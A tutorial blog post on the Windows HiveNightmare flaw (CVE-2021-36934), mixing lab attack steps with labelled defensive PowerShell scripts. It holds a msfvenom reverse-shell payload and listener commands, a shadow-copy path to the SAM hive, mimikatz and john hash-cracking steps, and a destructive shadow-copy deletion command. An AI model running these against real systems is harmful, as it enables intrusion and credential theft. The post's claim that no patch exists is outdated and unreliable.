Windows Privilege Escalation - Offense and Defense!
Windows Privilege Escalation
Prerequisites: a Windows VM, a Linux attack box, Empire/Metasploit for shell access (not demonstrated).
Vulnerability Details
CVE-2021-36934
Windows 10 and Windows 11 are affected by a local elevation of privilege vulnerability: users with low privileges can read sensitive Registry database files.
The database files associated with the Windows Registry are stored under the C:\Windows\System32\config folder and are split into separate files such as SYSTEM, SECURITY, SAM, DEFAULT and SOFTWARE.
These files contain sensitive information about all user accounts on a device and the security tokens used by Windows features.
This is especially true for the Security Account Manager (SAM) file, as it contains the hashed passwords for all users on a system, which threat actors can use to assume their identity.
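The two conditions described above (hive files readable by the low-privileged Users group, and shadow copies holding older copies of them) can be checked directly on a host. The script below is an added example and is not part of the original post; Test-HiveExposure and Get-ShadowCopyCount are names chosen here, the hive names and folder are the ones the post lists, and it assumes an elevated PowerShell prompt because enumerating shadow copies requires one.

```powershell
# Added example (not from the original post): report whether this host shows both
# conditions CVE-2021-36934 needs: BUILTIN\Users can read the registry hive files
# under %windir%\System32\config, and VSS shadow copies exist that hold older,
# equally readable copies of them. Run from an elevated prompt.
function Test-HiveExposure {
    param(
        [string]$ConfigDir = "$env:windir\System32\config",
        [string[]]$Hives = @('SAM', 'SECURITY', 'SYSTEM', 'DEFAULT', 'SOFTWARE')
    )
    $readMask = [System.Security.AccessControl.FileSystemRights]::ReadData
    foreach ($hive in $Hives) {
        $path = Join-Path $ConfigDir $hive
        # Only the security descriptor is read here, so the kernel's exclusive
        # lock on the live hive does not get in the way.
        $acl = Get-Acl -LiteralPath $path
        $usersRead = @($acl.Access | Where-Object {
            $_.IdentityReference.Value -eq 'BUILTIN\Users' -and
            $_.AccessControlType -eq 'Allow' -and
            (([int]$_.FileSystemRights) -band [int]$readMask)
        })
        [pscustomobject]@{
            Hive         = $hive
            UsersCanRead = $usersRead.Count -gt 0
            Inherited    = if ($usersRead.Count) { $usersRead[0].IsInherited } else { $null }
        }
    }
}

function Get-ShadowCopyCount {
    # Win32_ShadowCopy enumerates existing VSS snapshots; each one carries a copy of the hives
    @(Get-CimInstance -ClassName Win32_ShadowCopy -ErrorAction SilentlyContinue).Count
}

$exposure = @(Test-HiveExposure)
$exposure | Format-Table -AutoSize
$readable = @($exposure | Where-Object UsersCanRead)
$shadows  = Get-ShadowCopyCount
if ($readable.Count -and $shadows -gt 0) {
    Write-Warning "$($readable.Count) hive(s) readable by BUILTIN\Users and $shadows shadow copy(ies) present: CVE-2021-36934 conditions are met."
} elseif ($readable.Count) {
    Write-Warning "Hives readable by BUILTIN\Users; no shadow copy exists right now, but the next one created will expose them."
} else {
    Write-Output 'Hive ACLs do not grant BUILTIN\Users read access.'
}
```

The ACL check alone is what most published one-liners do (icacls on the SAM file); counting shadow copies as well separates "exposed today" from "exposed the moment System Restore or a backup job makes the next snapshot", which matters when deciding how urgently to apply the workaround.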
Environment Setup
Setting up a VM (Windows 10) in VirtualBox:
Download the VirtualBox client and install it.
Download a fresh image of Windows 10 from Microsoft's official website:
https://www.microsoft.com/en-us/software-download/windows10
Install VirtualBox and install Windows 10 in it.
Setting up Kali Linux (attack box in a virtual machine):
Download the pre-made Kali Linux machine from Offensive Security's website / Kali's official website:
https://www.offensive-security.com
Install it in VirtualBox as well.
Creating users in Windows
Open your newly installed Windows. You'll be logged in as an administrator by default. Create a low-privileged user.
Reference Screenshot:
After creating the user, log out and log in again as the low-privileged user.
Gaining Access from the Attack Box
Open up the Kali VM (the default username and password are kali:kali) and launch Metasploit. (Make sure to update the repositories first to avoid errors: sudo apt update && sudo apt upgrade.)
Create an executable for Windows with a Meterpreter payload:
msfvenom -p windows/meterpreter/reverse_tcp -a x86 --platform windows -f exe LHOST=<local-ip> LPORT=4444 -o /home/kali/update.listeners
Transfer this payload to Windows and execute it.
Then go to msfconsole and start a listener:
Reference Screenshot:
Commands used:
- msfconsole
- use exploit/multi/handler
- set payload windows/meterpreter/reverse_tcp
- set LHOST eth0
- set LPORT 4444
- exploit
You'll get a reverse shell (cmd). For demonstration purposes we used the Windows cmd.
Demonstration
On Windows 10 and Windows 11, the Registry files associated with the Security Account Manager (SAM), and all other Registry databases, are accessible to the 'Users' group, which has low privileges on a device.
With these weak file permissions, a threat actor with limited privileges on a device can extract the NTLM hashed passwords for all accounts on the device and use those hashes in pass-the-hash attacks to gain elevated privileges.
As you can see, we can't read the file directly, since it is always in use by the OS. BUT the registry files, including SAM, are also backed up by Windows Volume Shadow Copy, and we can take advantage of that.
As a threat actor, we can use the Win32 device namespace path of a shadow volume copy to access the file:
\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SAM
(Use this path in mimikatz to get all the NTLM hashes.)
Getting NTLM Hashes
You should use mimikatz for this task to get the NTLM hashes of all users on the machine, including local_admin. Then compare the hashes against a wordlist, e.g. rockyou.txt, to recover the passwords.
Example command: john <hash_file> --wordlist=/usr/share/wordlists/rockyou.txt
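From the defender's side, the distinctive artefact in the technique above is a process whose command line reaches a hive through the HarddiskVolumeShadowCopy device path. The script below is an added example, not part of the original post: it matches that pattern in Security event 4688 or Sysmon event 1 command lines, and exercises the matcher on constructed sample strings so it can be tried without live log data. Test-ShadowHiveAccess, Get-CommandLineFromEvent and Find-ShadowHiveAccess are names chosen here; the sample command lines and the dump.exe tool name in them are constructed, not real telemetry.

```powershell
# Added example (not from the original post): flag process-creation events whose
# command line opens a registry hive through the shadow-copy device namespace.
# Works on Security 4688 (requires the "Include command line in process creation
# events" policy) and on Sysmon Event ID 1, both of which carry a CommandLine field.
$HivePattern = 'HarddiskVolumeShadowCopy\d+\\Windows\\System32\\config\\(SAM|SECURITY|SYSTEM)\b'

function Test-ShadowHiveAccess {
    # Pure matcher so it can be unit-tested offline; -match is case-insensitive in PowerShell
    param([Parameter(Mandatory)][string]$CommandLine)
    $CommandLine -match $HivePattern
}

function Get-CommandLineFromEvent {
    # Both 4688 and Sysmon 1 expose <Data Name='CommandLine'> in the event XML
    param([System.Diagnostics.Eventing.Reader.EventRecord]$Event)
    $xml = [xml]$Event.ToXml()
    ($xml.Event.EventData.Data | Where-Object Name -eq 'CommandLine').'#text'
}

function Find-ShadowHiveAccess {
    param(
        [ValidateSet('Security', 'Sysmon')][string]$Source = 'Security',
        [int]$MaxEvents = 5000
    )
    $filter = if ($Source -eq 'Security') {
        @{ LogName = 'Security'; Id = 4688 }
    } else {
        @{ LogName = 'Microsoft-Windows-Sysmon/Operational'; Id = 1 }
    }
    Get-WinEvent -FilterHashtable $filter -MaxEvents $MaxEvents -ErrorAction SilentlyContinue |
        ForEach-Object {
            $cmd = Get-CommandLineFromEvent $_
            if ($cmd -and (Test-ShadowHiveAccess $cmd)) {
                [pscustomobject]@{
                    Time        = $_.TimeCreated
                    RecordId    = $_.RecordId
                    CommandLine = $cmd
                }
            }
        }
}

# Constructed sample command lines (not real log data) to exercise the matcher offline.
# Only the first one should be flagged; the other two are routine activity.
$samples = @(
    'C:\Users\lowpriv\dump.exe \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SAM',
    'C:\Windows\System32\vssadmin.exe list shadows',
    'C:\Windows\System32\svchost.exe -k netsvcs -p'
)
foreach ($s in $samples) {
    '{0,-5} {1}' -f (Test-ShadowHiveAccess $s), $s
}

# Live query against the local Security log:
# Find-ShadowHiveAccess -Source Security | Format-Table -AutoSize
```

Command-line matching only catches tools that put the device path on their command line; a tool that builds the path internally, or reads through a drive letter linked to the shadow copy, leaves nothing for this pattern to match. Pair it with object-access auditing on the hive files and with the ACL check, so that the exposure is found before anyone has to detect its use.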
How to Prevent the Exploit
Currently there's no patch for this vulnerability. But you can delete the shadow copies and restrict access to C:\Windows\System32\config.
Note: Delete the backed-up shadow copies before restricting access to System32\config.
Commands:
Deleting shadow copies: vssadmin delete shadows /all
Restrict access: icacls %windir%\system32\config\*.* /inheritance:e
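The two commands above can be wrapped so that they run in the order the post gives, support a dry run, and verify the result afterwards. This is an added example and not code from the original post; Invoke-HiveNightmareWorkaround is a name chosen here, and it assumes an elevated PowerShell prompt. Note that deleting every shadow copy also removes the restore points that depend on them.

```powershell
# Added example (not from the original post): apply the post's two mitigations in
# the post's order, with -WhatIf support, then confirm BUILTIN\Users is no longer
# listed on the hive files. Must run from an elevated prompt.
function Invoke-HiveNightmareWorkaround {
    [CmdletBinding(SupportsShouldProcess)]
    param(
        [string]$ConfigDir = "$env:windir\System32\config",
        [string[]]$Hives = @('SAM', 'SECURITY', 'SYSTEM')
    )

    # Step 1 (post): delete existing shadow copies so older, readable copies of the hives are gone.
    # /quiet suppresses the confirmation prompt; this also discards existing restore points.
    if ($PSCmdlet.ShouldProcess('all VSS shadow copies', 'Delete')) {
        & vssadmin.exe delete shadows /all /quiet | Out-Null
        if ($LASTEXITCODE -ne 0) { Write-Warning "vssadmin exited with code $LASTEXITCODE" }
    }

    # Step 2 (post): re-enable ACL inheritance on every file in the config folder so the
    # hives take the folder's ACL instead of keeping their own entries.
    if ($PSCmdlet.ShouldProcess("$ConfigDir\*.*", 'icacls /inheritance:e')) {
        & icacls.exe "$ConfigDir\*.*" /inheritance:e | Out-Null
        if ($LASTEXITCODE -ne 0) { Write-Warning "icacls exited with code $LASTEXITCODE" }
    }

    # Verify: after the change no hive should still list BUILTIN\Users in its ACL
    foreach ($hive in $Hives) {
        $aclText = & icacls.exe (Join-Path $ConfigDir $hive)
        $usersListed = $aclText | Select-String -SimpleMatch 'BUILTIN\Users'
        [pscustomobject]@{
            Hive        = $hive
            UsersListed = [bool]$usersListed
        }
    }
}

# Preview what would run, then apply for real:
# Invoke-HiveNightmareWorkaround -WhatIf
# Invoke-HiveNightmareWorkaround | Format-Table -AutoSize
```

The verification step re-reads the ACL with icacls rather than trusting the exit code, because icacls returns success as long as it processed the files, even if a later policy or installer puts an explicit Users entry back. Re-running the check after the next patch cycle or feature update is cheap and catches that.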
Final Thoughts
So far, this vulnerability hasn't been patched by Microsoft. Security researchers suggest that every corporate or local business should carry out the steps above: disable access to the C:\Windows\System32\config folder for everyone except local administrators and domain admins, and delete the shadow backup copies, to prevent this kind of situation.
Comments
Live demonstration?
I can comment.
It turned out very well, brother😘